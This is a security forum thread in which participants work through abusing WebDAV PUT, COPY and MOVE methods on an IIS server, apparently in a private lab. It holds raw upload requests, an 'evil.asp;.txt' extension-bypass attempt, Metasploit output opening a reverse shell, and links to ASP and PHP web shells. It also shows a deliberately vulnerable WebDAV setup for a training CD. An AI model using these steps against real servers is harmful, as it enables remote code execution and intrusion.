HTTP header: PUT, DELETE, etc

This topic contains 17 replies, has 6 voices, and was last updated by  ethicalhack3r 8 years, 9 months ago.

  • Author
    Posts
  • #5483
     caissyd 
    Participant

    Hi,

    When I use Nikto or Nessus to scan a web server, I often get messages like this:


    + OSVDB-0: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
    + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
    + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
    + OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
    + OSVDB-0: HTTP method ('Allow' Header): 'PROPFIND' may indicate DAV/WebDAV is installed. This may be used to get directory listings if indexing is allow but a default page exists.
    + OSVDB-0: HTTP method ('Allow' Header): 'PROPPATCH' indicates WebDAV is installed.
    + OSVDB-425: HTTP method ('Allow' Header): 'SEARCH' indicates DAV/WebDAV is installed, and may be used to get directory listings if Index Server is running.
    + OSVDB-0: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
    + OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
    + OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
    + OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
    + OSVDB-0: HTTP method ('Public' Header): 'PROPFIND' may indicate DAV/WebDAV is installed. This may be used to get directory listings if indexing is allow but a default page exists.
    + OSVDB-0: HTTP method ('Public' Header): 'PROPPATCH' indicates WebDAV is installed.
    + OSVDB-425: HTTP method ('Public' Header): 'SEARCH' indicates DAV/WebDAV is installed, and may be used to get directory listings if Index Server is running.

    How can I compromise a server using one of these headers? Can I use the PUT header method to upload a file on the server?

    Couldn’t find anything interesting on Google…

  • #34680
     dynamik 
    Participant

    Those are usually indicative of WebDAV, so you could try a WebDAV client. You’ll sometimes find that a OPTIONS / HTTP/1.0 will show a lot of methods like that, but you’ll get a 501 Not Implemented when you try to use them. WebDAV may also require authentication. Just google HTTP to see the syntax for using them manually through netcat or something.

  • #34681
     Xen 
    Participant

    PUT method can be used to upload a file to the server only if the directory is writable. If the user, with which the website is run, doesn’t have write privileges on a directory, you won’t be able to upload to that directory., even if PUT verb is allowed.

    How do you find if a website allows PUT verb?
    nc -v
    OPTIONS / HTTP/1.0

    How do you know if a directory is writable?
    You can follow a brute-force approach and try every directory.
    You can enumerate the directories used to store user ulploads like images, attachments etc and then try PUT method on each one of these.

    http://upload.thinfile.com/docs/put.php

  • #34682
     caissyd 
    Participant

    Thanks guys

    I was successful sending this (using the Burp Suite):

    PUT /test.txt HTTP/1.1
    Host: 192.168.1.199
    Content-Length: 6

    Yesss!

    Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google…

  • #34683
     caissyd 
    Participant

    Got some nice ASP code here:
    http://classicasp.aspfaq.com/general/how-do-i-execute-a-ping-command-from-asp-and-retrieve-the-results.html

    But I can’t create .asp files. Only .txt…

    Nothing is easy!  :-

  • #34684
     Xen 
    Participant

    I guess you should now be able to upload an asp script which provides a remote shell.

    http://skypher.com/index.php/2010/03/04/aspsh-a-remote-shell-written-in-asp/
    Note: I’ve never used the above script.

    Edit: I was a few seconds late.
          You should be able to create to more than just .txt files. Can you please try again?

  • #34685
     caissyd 
    Participant

    I tried again and this code doesn’t work:

    PUT /test.asp HTTP/1.1
    Host: 192.168.1.199
    Content-Length: 6

    Yesss!

    These file types work:

    • .txt
    • .html
    • .htm
    • .js
    • .vbs

    Maybe I am missing something in the HTTP header…

  • #34686
     Xen 
    Participant

    Are you getting any specific error message or just the code isn’t working?

  • #34687
     caissyd 
    Participant

    I get a 404 Object Not Found when I try to access it.

    All the other ones are there. Could it be that, by default, IIS prevent us from creating .asp files remotely?

  • #34688
     dynamik 
    Participant

    Can you use MOVE to rename it from a txt to an asp? I’m not that familiar with this stuff, but it might be worth a try.

  • #34689
     Xen 
    Participant

    I just read an article which might solve your problem. I didn’t understand how to take elements from this article and word it exactly for your problem, so I’m just linking it here (Being just a college student, I’ve my limitations ;)). http://blogs.msdn.com/b/david.wang/archive/2005/08/20/why-can-i-upload-a-file-without-iis-write-permission.aspx

  • #34690
     caissyd 
    Participant

    Thanks for the article, but it doesn’t solve my problem… 🙁

    I am working on COPY and MOVE right now…

  • #34691
     KrisTeason 
    Participant

    Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google…

    Maybe this may help?
    http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html

  • #34692
     caissyd 
    Participant

    Great reading!

    If you try to upload an .asp you’ll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you’ll get a forbidden. 🙁

    This is exactly my problem. But:

    Thankfully there is a “feature” of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.

    I was all excited, but the server doesn’t seem to be running this version of Windows (nmap -O couldn’t pin point the OS…)

    I tried:

    COPY /test.txt HTTP/1.1

    Host: 192.168.1.199

    Destination: http://192.168.1.199/test.asp;.txt

    I found other things on the server, so I will poke at them for a while.

    Thanks guys

  • #34693
     caissyd 
    Participant

    It worked!!!

    The Metasploit exploit iis_webdav_upload_asp did the trick:


    msf exploit(iis_webdav_upload_asp) > exploit

    [*] Started reverse handler on 192.168.1.100:4444
    [*] Uploading 612333 bytes to /metasploit161123510.txt...
    [*] Got a 100 response, trying to read again
    [*] Moving /metasploit161123510.txt to /metasploit161123510.asp...
    [*] Executing /metasploit161123510.asp...
    [*] Deleting /metasploit161123510.asp, this doesn't always work...
    [*] Sending stage (240 bytes) to 192.168.1.199
    [*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.199:3409) at Thu Aug 19 14:11:43 -0400 2010

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:WINDOWSsystem32>     

    ;D

  • #34694
     dynamik 
    Participant

    @xXxKrisxXx wrote:

    Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google…

    Maybe this may help?
    http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html

    Wow, that got nasty at the end 😉

    Nice find!

  • #34695
     Jhaddix 
    Participant

    DAVtest is a newer tool for testing extensive web server options,

    http://code.google.com/p/davtest/

    it has also been implemented as a Nmap script, check out the scripts directory for more information.

    The default shell it will give you is limited, i replace it with the new meterpreter PHP payload. Or you can supplement with Ironfist’s AJAXShell (clean, better, faster than c99/r57/etc):

    http://sourceforge.net/projects/ajaxshell/

  • #34696
     ethicalhack3r 
    Participant

    I’m trying to implement this vulnerability into the up and coming DVWA LiveCD.

    httpd.conf:


    DavLockDB "/opt/lampp/htdocs/hackable/uploads"
    Alias /webdav /opt/lampp/htdocs/hackable/uploads


    Dav On

    Apache is running as user ‘nobody’ in the ‘nogroup’ group.

    I can connect but not execute any commands.Using a webdav client ‘cadaver’ I get an internal server error 500 when trying to execute any commands.

    I assumed this was down to permissions so I changed the permissions as such:

    chown -R nobody /opt/lampp/htdocs/hackable/uploads

    Still no joy.

    The DavTest tool also connects but fails on MKCOL and any PUT requests.

    Any ideas?

    EDIT:–

    Apache 2.2.14, PHP 5.3.1, Ubuntu server 10.04 minimal

    EDIT:–

    Got it working. 🙂

    DavLockDB needs a file name not folder directory. So changed this:

    DavLockDB "/opt/lampp/htdocs/hackable/uploads"

    for this:

    DavLockDB "/opt/lampp/htdocs/hackable/uploads/DavLockDB"

You must be logged in to reply to this topic.

Copyright ©2019 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?